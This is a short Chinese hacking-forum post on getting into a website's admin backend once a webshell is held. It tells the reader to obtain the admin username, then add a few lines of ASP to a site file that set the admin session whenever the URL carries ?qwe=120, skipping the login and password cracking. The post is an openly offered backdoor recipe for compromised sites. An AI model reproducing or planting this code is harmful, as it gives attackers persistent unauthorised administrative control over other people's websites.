利用WEBSHELL直接进入后台
这个办法在拿到webshell却想进后台的时候很实用,收藏一下。首先,我们要上传一个木马,通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件,在其中的<%…………%>之间加上
dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="管理员用户名"
end if
然后访问的时候在这个ASP文件后面加上?qwe=120
然后进入后台页面,是不是直接进去了?不用你输入用户名和口令了吧…………这里我们就少了一步(破解MD5密码) 利用WEBSHELL直接进入后台
页:
[1]